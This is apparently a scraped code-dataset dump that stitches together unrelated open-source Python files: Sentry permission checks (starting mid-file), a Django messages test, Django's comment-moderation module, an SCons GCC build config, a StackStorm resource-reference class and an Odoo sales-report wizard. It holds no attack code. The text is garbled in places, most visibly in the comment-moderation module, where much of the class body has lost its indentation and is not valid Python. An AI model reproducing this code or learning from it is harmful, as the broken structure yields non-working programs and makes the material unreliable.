    """Decorator: make the wrapped permission check return ``False`` for
    anonymous/missing users without invoking the real logic.
    """
    @wraps(func)
    def wrapper(user, *args, **kwargs):
        authenticated = bool(user) and user.is_authenticated()
        if not authenticated:
            return False
        return func(user, *args, **kwargs)
    return wrapper
@requires_login
@perm_override('can_add_project')
def can_create_projects(user, team=None):
    """
    Return ``True`` if ``user`` may create a new project, optionally
    within ``team``.
    """
    # Creating a project inside a team requires team ownership.
    if team:
        if not team.member_set.filter(user=user, type=MEMBER_OWNER).exists():
            return False
    # Plugins get the first say; fall back to the global setting.
    result = plugins.first('has_perm', user, 'add_project', team)
    if result is None:
        result = settings.ALLOW_PROJECT_CREATION
    return result is not False
@requires_login
@perm_override('can_add_team')
def can_create_teams(user):
    """
    Return ``True`` if ``user`` may create a new team.
    """
    # Plugins get the first say; fall back to the global setting.
    result = plugins.first('has_perm', user, 'add_team')
    if result is None:
        result = settings.ALLOW_TEAM_CREATION
    return result is not False
@requires_login
@perm_override('can_change_project')
def can_set_public_projects(user):
    """
    Return ``True`` if ``user`` may change the ``public`` attribute of
    projects.
    """
    # Plugins get the first say; fall back to the global setting.
    result = plugins.first('has_perm', user, 'set_project_public')
    if result is None:
        result = settings.ALLOW_PUBLIC_PROJECTS
    return result is not False
@requires_login
@perm_override('can_add_teammember')
def can_add_team_member(user, team):
    """
    Return ``True`` if ``user`` may add members to ``team``; requires
    team ownership unless a plugin or Django permission overrides it.
    """
    if not team.member_set.filter(user=user, type=MEMBER_OWNER).exists():
        return False
    return plugins.first('has_perm', user, 'add_team_member', team) is not False
@requires_login
def can_manage_team_member(user, member, django_perm, perm):
    """
    Shared implementation behind the edit/remove team-member checks:
    an explicit Django permission wins, otherwise the user must own the
    member's team and no plugin may veto.
    """
    # permissions always take precedence
    if user.has_perm(django_perm):
        return True
    if not member.team.member_set.filter(user=user, type=MEMBER_OWNER).exists():
        return False
    return plugins.first('has_perm', user, perm, member) is not False
def can_edit_team_member(user, member):
    # Thin wrapper: edit rights map to the 'change_teammember' Django
    # permission and the 'edit_team_member' plugin permission.
    return can_manage_team_member(user, member, 'sentry.can_change_teammember', 'edit_team_member')
def can_remove_team_member(user, member):
    # Thin wrapper: removal rights map to the 'remove_teammember' Django
    # permission and the 'remove_team_member' plugin permission.
    return can_manage_team_member(user, member, 'sentry.can_remove_teammember', 'remove_team_member')
@requires_login
def can_remove_team(user, team):
    """
    Return ``True`` if ``user`` may delete ``team``.  A team that still
    owns projects can never be removed, regardless of permissions.
    """
    if team.project_set.exists():
        return False
    # permissions always take precedence
    if user.has_perm('sentry.can_remove_team'):
        return True
    if not team.member_set.filter(user=user, type=MEMBER_OWNER).exists():
        return False
    return plugins.first('has_perm', user, 'remove_team', team) is not False
@requires_login
def can_remove_project(user, project):
    """
    Return ``True`` if ``user`` may delete ``project``.  The default
    project can never be removed, regardless of permissions.
    """
    if project.is_default_project():
        return False
    # permissions always take precedence
    if user.has_perm('sentry.can_remove_project'):
        return True
    if not project.team.member_set.filter(user=user, type=MEMBER_OWNER).exists():
        return False
    return plugins.first('has_perm', user, 'remove_project', project) is not False
@requires_login
@perm_override('can_change_group')
def can_admin_group(user, group):
    # Local import to avoid a circular dependency at module load time.
    from sentry.models import Team
    # We make the assumption that we have a valid membership here
    try:
        Team.objects.get_for_user(user)[group.project.team.slug]
    except KeyError:
        # User has no membership in the group's team.
        return False
    result = plugins.first('has_perm', user, 'admin_event', group)
    if result is False:
        return False
    return True
| bsd-3-clause |
ar45/django | tests/messages_tests/test_api.py | 337 | 1453 | from django.contrib import messages
from django.test import RequestFactory, SimpleTestCase
class DummyStorage(object):
    """
    Minimal stand-in for a message storage backend used to exercise the
    messages API: it simply records every message passed to ``add()``.
    """
    def __init__(self):
        # Messages are kept in arrival order.
        self.store = []

    def add(self, level, message, extra_tags=''):
        # ``level`` and ``extra_tags`` are accepted for API compatibility
        # but intentionally ignored.
        self.store.append(message)
class ApiTest(SimpleTestCase):
    """Tests for the ``messages.add_message()`` API surface."""

    def setUp(self):
        # A fresh request and dummy storage for every test.
        self.rf = RequestFactory()
        self.request = self.rf.request()
        self.storage = DummyStorage()

    def test_ok(self):
        # With storage attached to the request, the message is recorded.
        msg = 'some message'
        self.request._messages = self.storage
        messages.add_message(self.request, messages.DEBUG, msg)
        self.assertIn(msg, self.storage.store)

    def test_request_is_none(self):
        # Passing no request raises TypeError and stores nothing.
        msg = 'some message'
        self.request._messages = self.storage
        with self.assertRaises(TypeError):
            messages.add_message(None, messages.DEBUG, msg)
        self.assertEqual([], self.storage.store)

    def test_middleware_missing(self):
        # Without the messages middleware, add_message() fails loudly...
        msg = 'some message'
        with self.assertRaises(messages.MessageFailure):
            messages.add_message(self.request, messages.DEBUG, msg)
        self.assertEqual([], self.storage.store)

    def test_middleware_missing_silently(self):
        # ...unless fail_silently=True is passed, which drops the message.
        msg = 'some message'
        messages.add_message(self.request, messages.DEBUG, msg,
                             fail_silently=True)
        self.assertEqual([], self.storage.store)
| bsd-3-clause |
varunagrawal/azure-services | varunagrawal/site-packages/django/contrib/comments/moderation.py | 95 | 13544 | """
A generic comment-moderation system which allows configuration of
moderation options on a per-model basis.
To use, do two things:
1. Create or import a subclass of ``CommentModerator`` defining the
options you want.
2. Import ``moderator`` from this module and register one or more
models, passing the models and the ``CommentModerator`` options
class you want to use.
Example
-------
First, we define a simple model class which might represent entries in
a Weblog::
from django.db import models
class Entry(models.Model):
title = models.CharField(maxlength=250)
body = models.TextField()
pub_date = models.DateField()
enable_comments = models.BooleanField()
Then we create a ``CommentModerator`` subclass specifying some
moderation options::
from django.contrib.comments.moderation import CommentModerator, moderator
class EntryModerator(CommentModerator):
email_notification = True
enable_field = 'enable_comments'
And finally register it for moderation::
moderator.register(Entry, EntryModerator)
This sample class would apply two moderation steps to each new
comment submitted on an Entry:
* If the entry's ``enable_comments`` field is set to ``False``, the
comment will be rejected (immediately deleted).
* If the comment is successfully posted, an email notification of the
comment will be sent to site staff.
For a full list of built-in moderation options and other
configurability, see the documentation for the ``CommentModerator``
class.
"""
import datetime
from django.conf import settings
from django.core.mail import send_mail
from django.contrib.comments import signals
from django.db.models.base import ModelBase
from django.template import Context, loader
from django.contrib import comments
from django.contrib.sites.models import Site
from django.utils import timezone
class AlreadyModerated(Exception):
    """
    Raised when a model which is already registered for moderation is
    attempting to be registered again.
    """
    pass
class NotModerated(Exception):
    """
    Raised when a model which is not registered for moderation is
    attempting to be unregistered.
    """
    pass
class CommentModerator(object):
"""
Encapsulates comment-moderation options for a given model.
This class is not designed to be used directly, since it doesn't
enable any of the available moderation options. Instead, subclass
it and override attributes to enable different options::
``auto_close_field``
If this is set to the name of a ``DateField`` or
``DateTimeField`` on the model for which comments are
being moderated, new comments for objects of that model
will be disallowed (immediately deleted) when a certain
number of days have passed after the date specified in
that field. Must be used in conjunction with
``close_after``, which specifies the number of days past
which comments should be disallowed. Default value is
``None``.
``auto_moderate_field``
Like ``auto_close_field``, but instead of outright
deleting new comments when the requisite number of days
have elapsed, it will simply set the ``is_public`` field
of new comments to ``False`` before saving them. Must be
used in conjunction with ``moderate_after``, which
specifies the number of days past which comments should be
moderated. Default value is ``None``.
``close_after``
If ``auto_close_field`` is used, this must specify the
number of days past the value of the field specified by
``auto_close_field`` after which new comments for an
object should be disallowed. Default value is ``None``.
``email_notification``
If ``True``, any new comment on an object of this model
which survives moderation will generate an email to site
staff. Default value is ``False``.
``enable_field``
If this is set to the name of a ``BooleanField`` on the
model for which comments are being moderated, new comments
on objects of that model will be disallowed (immediately
deleted) whenever the value of that field is ``False`` on
the object the comment would be attached to. Default value
is ``None``.
``moderate_after``
If ``auto_moderate_field`` is used, this must specify the number
of days past the value of the field specified by
``auto_moderate_field`` after which new comments for an
object should be marked non-public. Default value is
``None``.
Most common moderation needs can be covered by changing these
attributes, but further customization can be obtained by
subclassing and overriding the following methods. Each method will
be called with three arguments: ``comment``, which is the comment
being submitted, ``content_object``, which is the object the
comment will be attached to, and ``request``, which is the
``HttpRequest`` in which the comment is being submitted::
``allow``
Should return ``True`` if the comment should be allowed to
post on the content object, and ``False`` otherwise (in
which case the comment will be immediately deleted).
``email``
If email notification of the new comment should be sent to
site staff or moderators, this method is responsible for
sending the email.
``moderate``
Should return ``True`` if the comment should be moderated
(in which case its ``is_public`` field will be set to
``False`` before saving), and ``False`` otherwise (in
which case the ``is_public`` field will not be changed).
Subclasses which want to introspect the model for which comments
are being moderated can do so through the attribute ``_model``,
which will be the model class.
"""
auto_close_field = None
auto_moderate_field = None
close_after = None
email_notification = False
enable_field = None
moderate_after = None
    def __init__(self, model):
        """Store the model class being moderated (subclasses may introspect
        it through the ``_model`` attribute)."""
        self._model = model
def _get_delta(self, now, then):
"""
Internal helper which will return a ``datetime.timedelta``
representing the time between ``now`` and ``then``. Assumes
``now`` is a ``datetime.date`` or ``datetime.datetime`` later
than ``then``.
If ``now`` and ``then`` are not of the same type due to one of
them being a ``datetime.date`` and the other being a
``datetime.datetime``, both will be coerced to
``datetime.date`` before calculating the delta.
"""
if now.__class__ is not then.__class__:
now = datetime.date(now.year, now.month, now.day)
then = datetime.date(then.year, then.month, then.day)
if now < then:
raise ValueError("Cannot determine moderation rules because date field is set to a value in the future")
return now - then
def allow(self, comment, content_object, request):
"""
Determine whether a given comment is allowed to be posted on
a given object.
Return ``True`` if the comment should be allowed, ``False
otherwise.
"""
if self.enable_field:
if not getattr(content_object, self.enable_field):
return False
if self.auto_close_field and self.close_after is not None:
close_after_date = getattr(content_object, self.auto_close_field)
if close_after_date is not None and self._get_delta(timezone.now(), close_after_date).days >= self.close_after:
return False
return True
def moderate(self, comment, content_object, request):
"""
Determine whether a given comment on a given object should be
allowed to show up immediately, or should be marked non-public
and await approval.
Return ``True`` if the comment should be moderated (marked
non-public), ``False`` otherwise.
"""
if self.auto_moderate_field and self.moderate_after is not None:
moderate_after_date = getattr(content_object, self.auto_moderate_field)
if moderate_after_date is not None and self._get_delta(timezone.now(), moderate_after_date).days >= self.moderate_after:
return True
return False
def email(self, comment, content_object, request):
"""
Send email notification of a new comment to site staff when email
notifications have been requested.
"""
if not self.email_notification:
return
recipient_list = [manager_tuple[1] for manager_tuple in settings.MANAGERS]
t = loader.get_template('comments/comment_notification_email.txt')
c = Context({ 'comment': comment,
'content_object': content_object })
subject = '[%s] New comment posted on "%s"' % (Site.objects.get_current().name,
content_object)
message = t.render(c)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, recipient_list, fail_silently=True)
class Moderator(object):
    """
    Applies comment moderation across a set of registered models.

    Maintains a mapping from model classes to their associated
    moderation-class instances and hooks into the comment signals so
    that every incoming comment is run through the appropriate rules.

    Obtain an instance (this module exports one as ``moderator``) and
    call ``register``, passing the model class and a moderation class
    (a ``CommentModerator`` subclass).  Both must be the actual
    classes, not instances.  Call ``unregister`` with the model class
    to cease moderation.  For convenience, both methods also accept a
    list of model classes, which makes it easy to register several
    models with the same moderation class.

    Moderation runs in two phases: before a new comment is saved
    (which may mark it non-public or veto it outright) and immediately
    after saving (which deletes disallowed comments -- there is
    currently no way to prevent the single save before removal -- and
    sends any notification emails the comment generated).
    """
    def __init__(self):
        # model class -> moderation-class instance
        self._registry = {}
        self.connect()

    def connect(self):
        """
        Wire the moderation callbacks up to the pre- and post-save
        signals of the comment model.
        """
        signals.comment_will_be_posted.connect(self.pre_save_moderation, sender=comments.get_model())
        signals.comment_was_posted.connect(self.post_save_moderation, sender=comments.get_model())

    def register(self, model_or_iterable, moderation_class):
        """
        Register a model or a list of models for comment moderation
        with the given moderation class.

        Raise ``AlreadyModerated`` if any of the models are already
        registered.
        """
        if isinstance(model_or_iterable, ModelBase):
            model_or_iterable = [model_or_iterable]
        for candidate in model_or_iterable:
            if candidate in self._registry:
                raise AlreadyModerated("The model '%s' is already being moderated" % candidate._meta.module_name)
            self._registry[candidate] = moderation_class(candidate)

    def unregister(self, model_or_iterable):
        """
        Remove a model or a list of models from the set of models whose
        comments are moderated.

        Raise ``NotModerated`` if any of the models are not currently
        registered for moderation.
        """
        if isinstance(model_or_iterable, ModelBase):
            model_or_iterable = [model_or_iterable]
        for candidate in model_or_iterable:
            if candidate not in self._registry:
                raise NotModerated("The model '%s' is not currently being moderated" % candidate._meta.module_name)
            del self._registry[candidate]

    def pre_save_moderation(self, sender, comment, request, **kwargs):
        """
        Apply pre-save moderation: veto the comment (returning ``False``
        results in an HTTP 403 response) or mark it non-public, as the
        registered moderation class dictates.
        """
        model = comment.content_type.model_class()
        moderation = self._registry.get(model)
        if moderation is None:
            return
        target = comment.content_object
        # Comment will be disallowed outright (HTTP 403 response)
        if not moderation.allow(comment, target, request):
            return False
        if moderation.moderate(comment, target, request):
            comment.is_public = False

    def post_save_moderation(self, sender, comment, request, **kwargs):
        """
        Apply post-save moderation: send any notification emails for
        comments on registered models.
        """
        model = comment.content_type.model_class()
        if model in self._registry:
            self._registry[model].email(comment, comment.content_object, request)
# Module-level singleton; instantiating it connects the comment-signal
# handlers as a side effect.  Import this instance in your own code to
# use in registering your models for moderation.
moderator = Moderator()
| gpl-2.0 |
Leatherface75/xbmc | lib/libUPnP/Neptune/Build/Tools/SCons/gcc-generic.py | 199 | 1249 | import os
def generate(env, gcc_cross_prefix=None, gcc_strict=True, gcc_stop_on_warning=None):
    """Configure a SCons environment for building with GCC.

    :param env: SCons Environment to mutate in place.
    :param gcc_cross_prefix: toolchain prefix (e.g. ``arm-linux``); when
        set, AR/RANLIB/CC/CXX/LINK are pointed at the prefixed tools and
        the host PATH is made visible so they can be located.
    :param gcc_strict: when True, enable a strict set of warning flags.
    :param gcc_stop_on_warning: treat warnings as errors; defaults to the
        environment's ``stop_on_warning`` setting when not given.
    """
    # 'is None' (identity), not '== None': keeps an explicit False intact
    # and is the correct idiom for the sentinel test.
    if gcc_stop_on_warning is None:
        gcc_stop_on_warning = env['stop_on_warning']

    ### compiler flags
    if gcc_strict:
        env.AppendUnique(CCFLAGS = ['-pedantic', '-Wall', '-W', '-Wundef', '-Wno-long-long'])
        env.AppendUnique(CFLAGS = ['-Wmissing-prototypes', '-Wmissing-declarations'])
    else:
        env.AppendUnique(CCFLAGS = ['-Wall'])

    compiler_defines = ['-D_REENTRANT']
    env.AppendUnique(CCFLAGS = compiler_defines)
    env.AppendUnique(CPPFLAGS = compiler_defines)

    if env['build_config'] == 'Debug':
        env.AppendUnique(CCFLAGS = '-g')
    else:
        env.AppendUnique(CCFLAGS = '-O3')

    if gcc_stop_on_warning:
        env.AppendUnique(CCFLAGS = ['-Werror'])

    if gcc_cross_prefix:
        # BUGFIX: PATH was previously mutated twice -- first appended with
        # no ':' separator (producing a malformed entry), then prepended
        # again.  Prepend the host PATH exactly once, with a separator.
        env['ENV']['PATH'] = os.environ['PATH'] + ':' + env['ENV']['PATH']
        env['AR'] = gcc_cross_prefix+'-ar'
        env['RANLIB'] = gcc_cross_prefix+'-ranlib'
        env['CC'] = gcc_cross_prefix+'-gcc'
        env['CXX'] = gcc_cross_prefix+'-g++'
        env['LINK'] = gcc_cross_prefix+'-g++'
| gpl-2.0 |
jtopjian/st2 | st2common/st2common/models/system/common.py | 13 | 3366 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Public API of this module.
__all__ = [
    'InvalidReferenceError',
    'InvalidResourceReferenceError',
    'ResourceReference',
]

# Character separating the pack name from the resource name inside a
# string reference (e.g. 'mypack.myaction').
PACK_SEPARATOR = '.'
class InvalidReferenceError(ValueError):
    """Raised when a reference string cannot be parsed."""

    def __init__(self, ref):
        self.ref = ref
        # Keep the formatted message on the instance for callers that
        # read it directly instead of str()-ing the exception.
        self.message = 'Invalid reference: %s' % (ref)
        super(InvalidReferenceError, self).__init__(self.message)
class InvalidResourceReferenceError(ValueError):
    """Raised when a resource reference string cannot be parsed."""

    def __init__(self, ref):
        self.ref = ref
        # Keep the formatted message on the instance for callers that
        # read it directly instead of str()-ing the exception.
        self.message = 'Invalid resource reference: %s' % (ref)
        super(InvalidResourceReferenceError, self).__init__(self.message)
class ResourceReference(object):
    """
    Represents a reference to a resource which belongs to a content pack.
    """
    def __init__(self, pack=None, name=None):
        self.pack = self.validate_pack_name(pack=pack)
        self.name = name
        # Raises ValueError when either component is missing.
        self.ref = self.to_string_reference(pack=pack, name=name)

    @staticmethod
    def is_resource_reference(ref):
        """
        Naively decide whether the provided string looks like a resource
        reference -- it only checks for the presence of the separator.

        :rtype ref: ``str``
        """
        return PACK_SEPARATOR in ref

    @staticmethod
    def from_string_reference(ref):
        """Build a ``ResourceReference`` by parsing a ``pack.name`` string."""
        return ResourceReference(pack=ResourceReference.get_pack(ref),
                                 name=ResourceReference.get_name(ref))

    @staticmethod
    def to_string_reference(pack=None, name=None):
        """Join ``pack`` and ``name`` into a ``pack.name`` string reference."""
        if not (pack and name):
            raise ValueError('Both pack and name needed for building ref. pack=%s, name=%s' %
                             (pack, name))
        pack = ResourceReference.validate_pack_name(pack=pack)
        return PACK_SEPARATOR.join([pack, name])

    @staticmethod
    def validate_pack_name(pack):
        """Ensure the pack name does not itself contain the separator."""
        if PACK_SEPARATOR in pack:
            raise ValueError('Pack name should not contain "%s"' % (PACK_SEPARATOR))
        return pack

    @staticmethod
    def get_pack(ref):
        """Return the pack portion of ``ref`` (everything before the first separator)."""
        try:
            # partition() returns the whole string as the head when no
            # separator is present -- same result as split(sep, 1)[0].
            return ref.partition(PACK_SEPARATOR)[0]
        except (IndexError, AttributeError):
            raise InvalidResourceReferenceError(ref=ref)

    @staticmethod
    def get_name(ref):
        """Return the name portion of ``ref`` (everything after the first separator)."""
        try:
            return ref.split(PACK_SEPARATOR, 1)[1]
        except (IndexError, AttributeError):
            raise InvalidResourceReferenceError(ref=ref)

    def __repr__(self):
        return ('<ResourceReference pack=%s,name=%s,ref=%s>' %
                (self.pack, self.name, self.ref))
| apache-2.0 |
codekaki/odoo | addons/point_of_sale/wizard/pos_details.py | 55 | 2439 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv, fields
class pos_details(osv.osv_memory):
    """Transient wizard model used to print the Sales Details report."""
    _name = 'pos.details'
    _description = 'Sales Details'
    _columns = {
        'date_start': fields.date('Date Start', required=True),
        'date_end': fields.date('Date End', required=True),
        'user_ids': fields.many2many('res.users', 'pos_details_report_user_rel', 'user_id', 'wizard_id', 'Salespeople'),
    }
    _defaults = {
        # Both dates default to today at wizard-open time.
        'date_start': lambda *a: time.strftime('%Y-%m-%d'),
        'date_end': lambda *a: time.strftime('%Y-%m-%d'),
    }

    def print_report(self, cr, uid, ids, context=None):
        """
        Collect the wizard values and return the report action.

        @param self: The object pointer.
        @param cr: A database cursor
        @param uid: ID of the user currently logged in
        @param context: A standard dictionary
        @return : the 'pos.details' report action dictionary
        """
        if context is None:
            context = {}
        datas = {'ids': context.get('active_ids', [])}
        records = self.read(cr, uid, ids, ['date_start', 'date_end', 'user_ids'], context=context)
        form_values = records[0] if records else {}
        datas['form'] = form_values
        if form_values.get('id', False):
            datas['ids'] = [form_values['id']]
        return {
            'type': 'ir.actions.report.xml',
            'report_name': 'pos.details',
            'datas': datas,
        }
# NOTE(review): instantiating the class presumably registers the wizard
# model with the ORM (legacy OpenERP osv registration style) -- confirm
# against the framework version in use before removing.
pos_details()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.